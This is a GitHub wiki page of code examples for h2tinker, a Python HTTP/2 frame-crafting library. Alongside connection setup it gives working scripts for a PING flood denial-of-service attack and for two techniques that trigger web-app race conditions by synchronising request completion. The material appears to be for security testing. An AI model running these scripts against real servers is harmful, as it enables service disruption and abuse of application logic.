Examples - kspar/h2tinker GitHub Wiki

Set up a HTTP/2 connection with TLS

import h2tinker as h2

conn = h2.H2TLSConnection()
conn.setup('example.com')

Set up a plain HTTP/2 connection (h2c)

import h2tinker as h2

conn = h2.H2PlainConnection()
conn.setup('example.com')

Sending scapy frames

import h2tinker as h2
import scapy.contrib.http2 as scapy

# ...
# Connection setup omitted
# ...

# Scapy-generated frames can be sent directly
scapy_ping = scapy.H2Frame() / scapy.H2PingFrame('13371337')
conn.send_frames(scapy_ping)

# Remain listening for the ping response
conn.infinite_read_loop()

Ping flood attack

import h2tinker as h2

# ...
# Connection setup omitted
# ...

# Create 1000 ping frames to dump into the socket at once
pings = [h2.create_ping_frame() for _ in range(1000)]

# Send 1000 * 1000 PINGs
for _ in range(1000):
    conn.send_frames(*pings)

print('Done sending')

# Keep the connection open to force the server to respond
conn.infinite_read_loop()

Exploiting web app race conditions with HTTP/2

Last frame synchronisation method

import h2tinker as h2
import time
import scapy.contrib.http2 as scapy

# ...
# Connection setup omitted
# ...

# We gather the final DATA frames here
final_frames = []

# Generate 10 valid client stream IDs
for i in h2.gen_stream_ids(10):

    # Create request frames for POST /race
    req = conn.create_request_frames('POST', '/race', i)
    # Remove END_STREAM flag from HEADERS frame which is always first
    req.frames[0].flags.remove('ES')
    # Send the request frames
    conn.send_frames(req)
    # Create the final DATA frame using scapy and store it
    final_frames.append(scapy.H2Frame(flags={'ES'}, stream_id=i) / scapy.H2DataFrame())

# Sleep a little to make sure previous frames have been delivered
time.sleep(5)
# Send the final frames to complete the requests
conn.send_frames(*final_frames)

# Remain listening on the connection
conn.infinite_read_loop()

Dependant streams method

import h2tinker as h2

# ...
# Connection setup omitted
# ...

# Generate enough stream IDs
sids = h2.gen_stream_ids(20)
# 10 IDs will be used for the dependency chain
chain_sids = sids[:10]
# 10 IDs will be used for the concurrent race requests
race_sids = sids[10:]

# Here we gather the dep chain requests
dep_chain_reqs = []
# THis is the root of the chain, it doesn't depend on any request
root_req = conn.create_request_frames('POST', '/long', chain_sids[0])
dep_chain_reqs.append(root_req)

for i in range(len(chain_sids) - 1):
    # Stream ID of the previous link in the chain on which this request will depend
    prev_sid = chain_sids[i]
    # Stream ID of this request
    current_sid = chain_sids[i + 1]
    # Create the next link in the chain
    dep_req = conn.create_dependant_request_frames('POST', '/long', stream_id=current_sid, dependency_stream_id=prev_sid)
    dep_chain_reqs.append(dep_req)

# The last link in the chain on which all race requests will depend
end_of_chain_sid = chain_sids[-1]

# Create and gather the concurrent race requests
race_reqs = []
for sid in race_sids:
    race_req = conn.create_dependant_request_frames('POST', '/race', stream_id=sid, dependency_stream_id=end_of_chain_sid)
    race_reqs.append(race_req)

# First send the requests that create the dependency chain
conn.send_frames(*dep_chain_reqs)
# Finally, send the race requests that should get executed concurrently after the chain has completed
conn.send_frames(*race_reqs)

# Keep the connection open
conn.infinite_read_loop()
⚠️ **GitHub.com Fallback** ⚠️